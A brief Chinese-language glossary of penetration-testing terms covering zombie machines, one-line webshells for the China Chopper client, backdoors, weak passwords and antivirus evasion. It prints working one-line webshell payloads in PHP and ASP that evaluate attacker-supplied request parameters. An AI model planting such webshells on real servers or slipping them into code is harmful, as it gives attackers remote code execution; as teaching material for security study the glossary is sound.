名词解释： # 1. 肉鸡 傀儡机，是指可以被黑客远程控制的机器。 # 2.一句话木马 主要用于配合菜刀使用 ``` <?php @eval($_POST['chabug']);?> <%eval request("chabug")%> <%@ Page Language="Jscript"%> ``` ## 菜刀： 主要功能： 文件管理：缓存下载目录，并支持离线查看缓存目录。 虚拟终端：方便操作。 数据库管理：支持数据库图形化界面，支持大多数主流数据库。 # 3. 脚本木马(WEB SHELL) 空 # 4. 后门 目的就是为了让我们绕过安全控制获取目标权限。 一般是指那些绕过安全性控制而获取对程序或系统访问权的方法。 在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。 在渗透测试中有很多种后门(webshell、后台xss、3389登录shift后门等) # 5. 弱口令 例如：“admin” “123456”这些很容易被人破解的口令 叫做弱口令，弱口令是相对而言的。 # 6. 免杀 免杀的意思就是通过各种方式绕过杀毒软件拦截的过程